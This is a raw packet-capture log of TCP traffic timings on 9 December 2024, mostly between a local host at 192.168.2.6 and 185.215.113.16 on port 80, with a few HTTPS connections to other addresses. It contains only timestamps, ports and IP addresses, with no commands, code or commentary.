                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.644253969 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.647397041 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.647459984 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.647500038 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.650687933 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.650738955 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.650767088 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.653907061 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.653959990 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.654040098 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.657100916 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.657160044 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.657196045 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.660417080 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.660464048 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.660526991 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.663655043 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.663770914 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.663777113 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.666876078 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.666980028 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.667186975 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.742268085 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.742327929 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.742384911 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.743916035 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.744029999 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.744450092 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.746838093 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.746959925 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.747014046 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.749926090 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.749984026 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.750051975 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.752372026 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.752459049 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.752506018 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.754838943 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.755259991 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.755295992 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.755383968 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.757746935 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.757947922 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.757982969 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.760288000 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.760346889 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.760375977 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.762728930 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.762785912 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.762923956 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.765224934 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.765263081 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.765443087 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.767447948 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.767590046 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.768579960 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.769634962 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.769679070 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.769772053 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.771902084 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.771965981 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.771995068 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.774068117 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.774107933 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.774171114 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.776246071 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.776318073 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.778372049 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.778569937 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.780529022 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.780647039 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.782546043 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.782645941 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.782717943 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.782794952 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784135103 CET50013443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784173965 CET44350013104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784274101 CET50013443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784570932 CET50013443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784580946 CET44350013104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784749985 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784785032 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.784816027 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.787261963 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.787308931 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.787831068 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.788887978 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.789118052 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.789140940 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.790975094 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.791023016 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.791047096 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.792948961 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.793020010 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.793088913 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.794903040 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.794959068 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.795036077 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.796931982 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.796969891 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.796977043 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.798885107 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.798978090 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.799038887 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.800915003 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.800961971 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.801033974 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.802903891 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.802942038 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.802959919 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.804888964 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.804919004 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.804935932 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.807287931 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.807343006 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.808986902 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.809073925 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.809983969 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.811192989 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.811235905 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.811307907 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.812946081 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.813000917 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.813024998 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.814954996 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.814995050 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.815134048 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.816884995 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.816914082 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.816931963 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.818865061 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.818907976 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.818912029 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.820849895 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.821028948 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.822825909 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.822828054 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.822964907 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.824842930 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.825032949 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.825263977 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.826889992 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.827003956 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.828881025 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.828891993 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.828995943 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.829346895 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.830893993 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.830975056 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.831448078 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.832912922 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.832956076 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.832957029 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.834850073 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.834903002 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.835047007 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.836802006 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.836873055 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.836924076 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.838841915 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.838886976 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.838938951 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.840828896 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.840868950 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.840869904 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.842890978 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.842945099 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.842971087 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.844856024 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.844968081 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.845153093 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.846793890 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.846862078 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.846915960 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.847779989 CET8050004185.215.113.206192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.847848892 CET5000480192.168.2.6185.215.113.206
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.848778009 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.848905087 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.849570990 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.850558043 CET5000480192.168.2.6185.215.113.206
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.850729942 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.850784063 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.896786928 CET50014443192.168.2.635.244.181.201
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.896843910 CET4435001435.244.181.201192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.896998882 CET50015443192.168.2.634.117.188.166
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.897011995 CET4435001534.117.188.166192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.897744894 CET50014443192.168.2.635.244.181.201
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.897744894 CET50015443192.168.2.634.117.188.166
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.897872925 CET50014443192.168.2.635.244.181.201
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.897885084 CET4435001435.244.181.201192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.899291039 CET50015443192.168.2.634.117.188.166
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.899301052 CET4435001534.117.188.166192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.930032969 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.930063009 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.930741072 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.930783987 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.932341099 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.932445049 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.933897972 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.934022903 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.935477018 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.935594082 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.937037945 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.937118053 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.938575983 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.938699007 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.944246054 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.944329023 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.944969893 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.945010900 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.945755005 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.946424961 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.946544886 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.947892904 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.948061943 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.949265003 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.949397087 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.950723886 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.950828075 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.952044964 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.952086926 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.953416109 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.953540087 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.954869986 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.954898119 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.956163883 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.956260920 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.956300020 CET44350002142.250.181.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.957062960 CET44350002142.250.181.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.957510948 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.957629919 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.958864927 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.958884001 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.960135937 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.960206032 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.961493015 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.961524010 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.961592913 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.962835073 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.962905884 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.964104891 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.964220047 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.965466022 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.965650082 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.966660976 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.966727018 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.967930079 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.967994928 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.969186068 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.969297886 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.969810963 CET8050004185.215.113.206192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.970444918 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.970598936 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.971333027 CET44350002142.250.181.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.971690893 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.971802950 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.972958088 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.973054886 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.973081112 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.973166943 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.973172903 CET50002443192.168.2.6142.250.181.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.974283934 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.974502087 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.975578070 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.975677967 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.976502895 CET50002443192.168.2.6142.250.181.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.976660013 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.976686954 CET5000080192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.976772070 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.977933884 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.977968931 CET8050000185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:57.979208946 CET8050000185.215.113.16192.168.2.6
